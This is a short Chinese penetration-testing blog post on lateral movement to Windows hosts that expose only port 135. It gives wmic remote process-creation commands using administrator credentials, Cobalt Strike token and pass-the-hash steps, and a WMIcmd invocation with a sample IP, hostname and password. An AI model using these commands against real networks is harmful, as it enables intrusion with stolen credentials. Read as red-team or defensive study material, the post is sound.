代码改变世界

[内网渗透]通过135端口进行横向

2021-11-04 16:09  rnss  阅读(1140)  评论(0编辑  收藏  举报

若内网中有windows机器只开放了135端口,可通过wmi进行执行命令横向

前提:拥有目标凭证

wmic /node:<IP> /user:administrator /password:<password> process call create "cmd.exe /c ipconfig > C:\ipconfig.txt"

image-20211104152756531.png

image-20211104153152165

在CS中如果有令牌或pth可以不用帐号密码

make_token administrator <password>
# pth administrator <hash>
wmic /node:<IP> process call create "cmd.exe /c ipconfig > C:\ipconfig.txt"

可是这样执行命令没有回显,如何能有回显?

使用WMIcmd

https://github.com/nccgroup/WMIcmd

但是有个前提是要知道hostname(不在域内的机器)或域名(在域内的机器)

WMIcmd.exe -h 192.168.77.171 -d WIN-887RATLMALI -u administrator -p 123456 -c whoami

image-20211104153806502